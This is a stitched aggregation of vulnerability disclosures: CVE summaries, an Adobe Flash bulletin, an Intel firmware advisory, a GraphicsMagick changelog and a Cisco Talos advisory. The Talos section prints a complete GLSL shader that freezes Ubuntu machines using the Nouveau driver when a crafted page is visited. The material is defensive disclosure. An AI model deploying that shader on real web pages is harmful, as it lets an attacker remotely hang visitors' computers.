Insufficient policy enforcement in extensions in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to initiate the extensions installation user interface via a crafted HTML page.

CVE-2019-5793

Integer overflow in PDFium in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially perform out of bounds memory access via a crafted PDF file.

CVE-2019-5792

Inappropriate optimization in V8 in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.

CVE-2019-5791

CVE-2019-5795

Lack of correct bounds checking in Skia in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.

CVE-2019-5798

Use-after-garbage-collection in Blink in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-5787

Adobe Flash Player versions 32.0.0.156 and earlier, 32.0.0.156 and earlier, and 32.0.0.156 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution.

Updates available for Adobe Flash Player | APSB19-19

Bulletin ID

Date Published

Priority

APSB19-19

April 09, 2019

 2

Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address a critical and an important vulnerability in Adobe Flash Player. Successful exploitation could lead to arbitrary code execution in the context of the current user. 

Product

Version

Platform

Adobe Flash Player Desktop Runtime

32.0.0.156 and earlier 

Windows, macOS and Linux

Adobe Flash Player for Google Chrome

32.0.0.156 and earlier

Windows, macOS, Linux and Chrome OS 

Adobe Flash Player for Microsoft Edge and Internet Explorer 11

32.0.0.156 and earlier

Windows 10 and 8.1

To verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right- click on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the latest version:

Note:

*   Adobe recommends users of the Adobe Flash Player Desktop Runtime for Windows, macOS and Linux update to Adobe Flash Player 32.0.0.171 via the update mechanism within the product \[1\] or by visiting the Adobe Flash Player Download Center.
*   Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 32.0.0.171 for Windows, macOS, Linux and Chrome OS.
*   Adobe Flash Player installed with Microsoft Edge and Internet Explorer 11 for Windows 10 and 8.1 will be automatically updated to the latest version, which will include Adobe Flash Player 32.0.0.171.
*   Please visit the Flash Player Help page for assistance in installing Flash Player.

\[1\] Users who have selected the option to 'Allow Adobe to install updates' will receive the update automatically. Users who do not have the 'Allow Adobe to install updates' option enabled can install the update via the update mechanism within the product when prompted.

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVE Number**

Out-of-bounds read 

Information Disclosure 

Important   

CVE-2019-7108 

Use After Free

Arbitrary Code Execution

Critical

CVE-2019-7096

Adobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Anonymously reported via Trend Micro’s Zero Day Initiative (CVE-2019-7108)
    
*   Haifei Li of McAfee (CVE-2019-7096)

CVE-2019-7096: Adobe Security Bulletin

Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory**

Intel ID:

INTEL-SA-00213

Advisory Category:

Firmware, Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

05/14/2019

Last revised:

04/14/2020

**Summary: **

Multiple potential security vulnerabilities in Intel® Converged Security & Management Engine (Intel® CSME), Intel® Server Platform Services (Intel® SPS), Intel® Trusted Execution Engine Interface (Intel® TXE), Intel® Dynamic Application Loader (Intel® DAL), and Intel® Active Management Technology (Intel® AMT) may allow escalation of privilege, information disclosure, and/or denial of service. Intel is releasing Intel® CSME, Intel® SPS, Intel® TXE, and Intel® AMT updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0089

Description: Improper data sanitization vulnerability in subsystem in Intel(R) SPS before versions SPS\_E5\_04.00.04.381.0, SPS\_E3\_04.01.04.054.0, SPS\_SoC-A\_04.00.04.181.0, and SPS\_SoC-X\_04.00.04.086.0 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H

CVEID: CVE-2019-0090

Description:  Insufficient access control vulnerability in subsystem for Intel(R) CSME versions 11.x, Intel(R) CSME version 12.0.35, Intel(R) TXE versions 3.x, 4.x, Intel(R) Server Platform Services versions 3.x, 4.x, before SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.1 High  

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0086

Description: Insufficient access control vulnerability in Dynamic Application Loader software for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0091

Description: Code injection vulnerability in installer for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

CVEID: CVE-2019-0092

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0093

Description: Insufficient data sanitization vulnerability in HECI subsystem for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0094

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable denial of service via adjacent network access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2019-0096

Description: Out of bound write vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an authenticated user to potentially enable escalation of privilege via adjacent network access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H

CVEID: CVE-2019-0097

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

CVSS Base Score: 4.9 Medium

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVEID: CVE-2019-0098

Description: Logic bug vulnerability in subsystem for Intel(R) CSME before version 12.0.35, Intel(R) TXE before 3.1.65, 4.0.15 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0099

Description: Insufficient access control vulnerability in subsystem in Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0153

Description: Buffer overflow in subsystem in Intel(R) CSME 12.0.0 through 12.0.34 may allow an unauthenticated user to potentially enable escalation of privilege via network access.  

CVSS Base Score: 9.0 Critical

CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0170

Description: Buffer overflow in subsystem in Intel(R) DAL before version 12.0.35 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35

Intel® CSME, Intel® Active Management Technology, and Intel® DAL

Updated Intel® CSME Firmware Version

Replaces Intel® CSME Firmware Version

11.8.65

11.0 thru 11.8.60

11.11.65

11.10 thru 11.11.60

11.22.65

11.20 thru 11.22.60

12.0.35

12.0 thru 12.0.20

Intel® Server Platform Services before versions SPS\_E3\_05.01.03.094.0, SPS\_E5\_04.00.04.381.0 and SPS\_E5\_04.01.04.054.0 

Intel® Server Platform Services

Updated Intel® Server Platform Services Firmware Version

Replaces Intel® Server Platform Services Firmware Version

SPS\_E3\_05.01.03.094.0, SPS\_SoC-A\_04.00.04.181.0 and SPS\_SoC-X\_04.00.04.086.0

SPS\_E3\_05.00.00.000.0 thru SPS\_E3\_05.00.04.027.0, SPS\_SoC-A\_04.00.00.000.0 thru SPS\_SoC-A\_04.00.04.177.0

SPS\_E5\_04.00.04.381.0

SPS\_E5\_04.00.00 through SPS\_E5\_04.00.03

SPS\_E5\_04.01.04.054.0

SPS\_E5\_04.01.00 through SPS\_E5\_04.01.03

Intel® Trusted Execution Engine before TXE 3.1.65, 4.0.15

Intel® Trusted Execution Engine

Updated Intel® Trusted Execution Engine Firmware Version

Replaces Intel® Trusted Execution Engine Firmware Version

3.1.65

3.0 thru 3.1.50

4.0.15

4.0 thru 4.0.5

**Note**:  Firmware versions of Intel® ME 3.x thru 10.x, Intel® TXE 1.x thru 2.x and Intel® Server Platform Services 1.x thru 2.X are no longer supported, thus were not assessed for the vulnerabilities/CVEs listed in this Technical Advisory. There is no new release planned for these versions.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT update to the latest version provided by the system manufacturer that addresses these issues.

Consult updated security guidance for CVE-2019-0090 published here. Additional information on this vulnerability can be found in the CVE-2019-0090 Technical Whitepaper here. 

**Acknowledgements:**

Intel would like to thank Lasse Borup (CVE-2019-0086) for reporting this issue.

CVE-2019-0090 was initially found externally by an Intel partner and subsequently reported by Positive Technologies researchers. Intel would like to thank Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy from Positive Technologies for reporting this issue.

The additional issues were found internally by Intel employees. Intel would like to thank Alex Gutkin, Arie Haenel, Michael Henry, Moshe Wagner, Tikvah Katz, Yaakov Cohen and Yair Netzer.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/14/2019  

Initial Release

1.1

05/20/2019

CVE correction

1.2

07/01/2019

Updated Affected Products

1.3

02/11/2020

Updates to CVE-2019-0090, recommendations and acknowledgements  

1.4

02/14/2020

Clarified versions in CVE-2019-0090  

1.5

03/11/2020

Updates to SPS versions in:

*   CVE-2019-0090, CVE-2019-0093, CVE-2019-0099.  
    
*   Affected products section.   
    

1.6

04/14/2020

Updates to affected SPS versions  

Updates to the recommendation; added link to the Technical whitepaper for CVE-2019-0090  

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0097: INTEL-SA-00213

coders/xwd.c in GraphicsMagick 1.3.31 allows attackers to cause a denial of service (floating-point exception and application crash) by crafting an XWD image file, a different vulnerability than CVE-2019-11008 and CVE-2019-11009.

2023-02-26 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   Makefile.am: Stop producing BZip, Gzip, Lzip, and Zstandard compressed archives so the only tar option is XZ compressed. See if anyone complains.
>     
> *   www/download.rst: Add summary documentation regarding archive formats.
>     

2023-02-12 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/jpeg.c (ReadJPEGImage): Replace MagickAllocateResourceLimitedArray() with MagickAllocateResourceLimitedClearedArray() and eliminate explicit memset().
>     

2023-02-08 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   magick/blob.c (ImageToBlob): Immediately reject attempts to write blobs to formats which can not support blobs.
>     

2023-02-06 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/mpc.c (RegisterMPCImage): Set seekable\_stream and blob\_support to false.
>     

2023-02-05 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/configure/configure.rc Changed "Configure.EXE" to "configure.exe"
>     
> *   VisualMagick/configure/configure.exe Configure.exe has been blacklisted with 6 antiviruses. https://www.virustotal.com/gui/file/3a0e54c8439200faf666b5680e0608e93fd67b5cda0d72dc32f54f0308574aba
>     

2023-02-04 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   configure.ac: Test for interesting libjpeg-turbo 3.0 functions (which may also appear in other JPEG libraries).
>     
> *   coders/jpeg.c: Block out existing code for C\_LOSSLESS\_SUPPORTED and D\_LOSSLESS\_SUPPORTED when compiling with JPEG-Turbo 3.0 since it is not compatible with it.
>     
> *   coders/wpg.c (ApproveFormatForWPG): Pass in existing ExceptionInfo pointer.
>     

2023-01-31 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   coders/wpg.c: Do not approve any format from "META" module for embedding.
>     

2023-01-28 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/wpg.c (WriteWPGImage): image->colors is only valid for storage\_class == PseudoClass.
>     

2023-01-25 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   coders/wpg.c: Format "8BIMTEXT" cannot be embedded inside WPG.
>     

2023-01-24 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/tests/runtest.bat Add missing tests of fileformats.
>     

2023-01-15 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   tests/rwblob.tap: Add sanity test for WPG format.
>     
> *   tests/rwfile.tap: Add sanity test for WPG format.
>     
> *   coders/wpg.c: Change line terminations back to ISO standard format. (RegisterWPGImage): WPG currently only supports one frame.
>     
> *   Makefile.am: No longer produce ".sig" files since the ".asc" files can do everything that the ".sig" files can do.
>     

2023-01-15 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/tests/runtest.bat
>     
> *   coders/wpg.c Added WPG writer ... cross your fingers.
>     

2023-01-14 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   PerlMagick/MANIFEST: Update PerlMagick manifest.
>     
> *   version.sh: Updated for 1.3.40 release.
>     
> *   NEWS.txt: Updated the news.
>     

2023-01-13 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/jxl.c (ReadJXLImage): Cache and trace extra channel info.
>     

2023-01-11 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   coders/wpg.c Fixed Monochromatic bilevel WPG should answer to gm identify file.wpg ..... PseudoClass 2c 8-bit
>     

2023-01-08 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   coders/wpg.c Fixed deffect in WPG header reading.
>     

2023-01-08 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/png.c (WriteOnePNGImage): Use lower-case raw profile identifiers (e.g. 'Raw profile type xmp') because exiftool expects that. Partially addresses concerns raised by SourceForge bug #682 "Invalid storage of XMP in PNGs".
>     
> *   www/INSTALL-unix.rst: Add notes about required libjxl versions.
>     
> *   README.txt: Add notes about required libjxl versions.
>     

2023-01-08 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/tests/runtest.bat Added new tests for WEBP, BMP2 & BMP3. These tests are passing.
>     

2023-01-07 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   NEWS.txt: Updated the news.
>     
> *   It is 2023 now! Update copyrights, rotate changelogs, etc.
>     
> *   magick/blob.c (OpenBlob): Zlib has never supported opening Unix 'compress' .Z files (although gzip does). So don't open such files using zlib.
>     
> *   coders/sun.c: Add IM1, IM8, and IM24 magick aliases for Sun Raster format since those are the historically correct extensions.
>     

2023-01-06 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/sun.c (ReadSUNImage): Address oss-fuzz 54810 "graphicsmagick:coder\_SUN\_fuzzer: Heap-buffer-overflow in ReadSUNImage".
>     
> *   coders/pict.c (WritePICTImage): Fix use of logical operator where binary operator is needed.
>     

2023-01-05 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/installer/inc/body.isx 64 bit distribution MUST NOT be installed on pure 32 bit system. Sanity check added.
>     

2023-01-05 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/installer/inc/body.isx
>     
> *   VisualMagick/installer/inc/files-dlls.isx (VisualMagick/installer/redist/VC2008SP1/vcredist\_x64.exe must be downloaded from www). (VisualMagick/installer/redist/VC2008SP1/vcredist\_x86.exe must be downloaded from www). Fix graphics magick installer for Windows.
>     

2023-01-04 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/tests/runtest.bat Added new tests for PGX (jp2), MAT, uncommented test for EPDF and PICON.
>     

2023-01-03 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/jp2/src/appl/UTILITY.txt removed fuzz.c.
>     

2023-01-03 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   VisualMagick/jp2/src/libjasper/pgx/LIBRARY.txt
>     
> *   jp2/src/libjasper/include/jasper/jas\_config.h PGX codec was not compilled into gm, now added.
>     

2023-01-02 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/pict.c: Add more tracing.
>     

2023-01-01 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   coders/pcd.c (WritePCDTile): Handle writing image with a dimension of 1.
>     

2023-01-02 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   jp2/\* Update lib jasper to 2.0.33. Code cleanly compilles, but there is still some problem. Will be solved later. jp2/src/lib/jasper/include/jasper/stdbool2.h No longer needed.
>     

2023-01-01 Bob Friesenhahn <bfriesen@simple.dallas.tx.us\>

> *   magick/utility.c (GetMagickGeometry): Assure that width and height are not scaled down to zero since it is an invalid value.
>     
> *   coders/sun.c (ReadSUNImage): Enlarge RLE output buffer in order to avoid buffer overflow. Addresses oss-fuzz 54716 "graphicsmagick:coder\_RAS\_fuzzer: Heap-buffer-overflow in ReadSUNImage", which is due to a new problem added since the 1.3.39 release.
>     

2023-01-01 Fojtik Jaroslav <JaFojtik@yandex.com\>

> *   jp2/\* Update lib jasper to 2.0.0.
>

CVE-2019-11474

A remote denial-of-service vulnerability exists in the way the Nouveau Display Driver (the default Ubuntu Nvidia display driver) handles GPU shader execution. A specially crafted pixel shader can cause remote denial-of-service issues. An attacker can provide a specially crafted website to trigger this vulnerability. This vulnerability can be triggered remotely after the user visits a malformed website. No further user interaction is required. Vulnerable versions include Ubuntu 18.04 LTS (linux 4.15.0-29-generic x86_64), Nouveau Display Driver NV117 (vermagic: 4.15.0-29-generic SMP mod_unload).

**Summary**

A remote denial-of-service vulnerability exists in the way the Nouveau display driver (the default Ubuntu Nvidia display driver) handles GPU shader execution. A specially crafted pixel shader can cause remote denial-of-service issues. An attacker can provide a specially crafted website to trigger this vulnerability. This vulnerability can be triggered remotely after the user visits a malformed website. No further user interaction is required.

**Tested Versions**

Ubuntu 18.04 LTS (linux 4.15.0-29-generic x86\_64), Nouveau Display Driver NV117 (vermagic: 4.15.0-29-generic SMP mod\_unload)

**Product URLs**

https://nouveau.freedesktop.org/wiki/ http://ubuntu.com

**CVSSv3 Score**

7.4 - AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

**CWE**

CWE-400: Uncontrolled Resource Consumption

**Details**

This vulnerability can be triggered by a user visiting a specifically crafted website. Such an attack can render the entire machine frozen until the machine reboots (in most cases a manual machine reboot is required). We were able to launch this attack remotely using popular browsers on the client’s end, such as Google Chrome and Mozilla Firefox.

Nouveau is a free and open-source graphics device driver for Nvidia video cards and the Tegra family of systems on a chip written by independent software engineers with minor help from Nvidia employees. The project’s goal is to create an open-source driver by reverse engineering Nvidia’s proprietary Linux drivers. It is managed by the X.Org Foundation, hosted by freedesktop.org, and is distributed as part of Mesa 3D. Since the Ubuntu 10.04 LTS (Lucid Lynx), Ubuntu decided to switch the Nvidia graphics driver to Nouveau by default \[1\].

The following shader is triggering the denial-of-service vulnerability on an Ubuntu machine:

    #ifdef GL_ES
    precision mediump float;
    #endif
    
    uniform float time;
    
    #define LINEAR_INTERPOLATION
    
    vec3 func4(float index) {
        index = mod(index * index, 250.0);
        vec3 xout = vec3(index, index, index);
        return xout;
        
    }
     
    float func3(vec3 position) {
        
        vec3 var_1 = floor(position);
     
        float var_dummy[8];
        for (float z=0.0; z<2.0; z++) {
            for (float y=0.0; y<2.0; y++) {
                for (float x=0.0; x<2.0; x++) {
                    vec3 var_pos = var_1 + vec3(x, y, z);
                    vec3 var_vector = func4(var_pos.x);
                    var_dummy[int((z*4.0) + (y*2.0) + x)] = dot(var_vector, var_vector);
                }
            }
        }
        
        return var_dummy[0];
    }
    
    
    const float var_2 = 0.24;
    
    float func2(float var_2) {
      if (time < 1.0) return var_2;
      else return -1.0;
    }
    
    
    void main() {
      float t = func2(var_2);
      vec4 color;
    
      if (t == -1.0) {
          vec3 noisePoint = vec3(time*0.01, time*0.2, time*0.3); 
          vec4 color = vec4(0.1, 0.1, 0.1, 1.0);
          color.rgb *= 1.0 - func3(noisePoint);
          gl_FragColor = color;
          return ;
      }
      gl_FragColor = color;
    

The analysis of this bug mostly relies on assumptions since there is no kernel crash (crash dump information) to investigate. The Ubuntu graphics interface just freezes. We assume that the GPU shader is consuming too many resources and eventually renders the machine unusable. At this point, a watchdog mechanism should step in, but for some unknown reason, it doesn’t. The same vulnerability does not trigger on other systems (for example Windows) and even on Ubuntu Linux itself. Proprietary Nvidia drivers are not vulnerable to this attack.

**Timeline**

2018-08-03 - Vendor Disclosure  
2018-09-26 - 2nd Vendor follow up  
2018-09-28 - Vendor acknowledged; Copy of report emailed to point of contact assigned  
2018-10-11 - 3rd copy of report sent; vendor claimed issues with receiving file via email  
2018-10-15 - 4th copy of report sent  
2018-11-05 - Vendor advised report under review  
2018-12-10 - Vendor advised “issues are known already”  
2019-01-10 - 90+ day follow up (125 days)  
2019-03-26 - Public Release

Discovered by Piotr Bania of Cisco Talos.

Tag

#chrome